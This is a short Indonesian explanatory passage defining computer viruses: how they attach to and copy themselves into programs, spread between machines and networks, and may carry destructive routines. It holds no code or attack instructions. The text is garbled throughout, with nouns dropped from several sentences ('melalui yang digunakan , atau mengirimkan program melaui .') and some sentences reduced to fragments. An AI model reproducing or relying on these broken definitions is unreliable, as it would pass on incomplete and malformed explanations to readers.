Virus Komputer adalah kode yang ditempelkan dalam satu yang menyebabkan pengkopian dirinya disisipkan ke satu program lain atau lebih. Program program-program lain dengan program-program itu. Modifikasi itu termasuk memasukkan kopian program program virus yang kemudian dapat menginfeksi program-program lain. Selain hanya propagasi, salah satu ini biasanya melakukan fungsi yang tak diinginkan. Seperti virus biologis, pada kode instruksi yang dapat membuat kopian sempurna seperti dirinya. Ketika komputer yang terinfeksi berhubungan dengan yang belum terinfeksi, virus memasuki program baru. Infeksi dapat menyebar dari komputer satu ke yang lainnya melalui yang digunakan , atau mengirimkan program melaui . Pada lingkungan jaringan, kemampuan mengakses aplikasi dan komputer lain merupakan fasilitas sempurna penyebaran virus. Sebuah virus dapat berisi tertentu yang diisikan oleh virus. Rutin-rutin ini bisa saja berisi perintah perusakan atau hanya sekedar menampilkan pesan.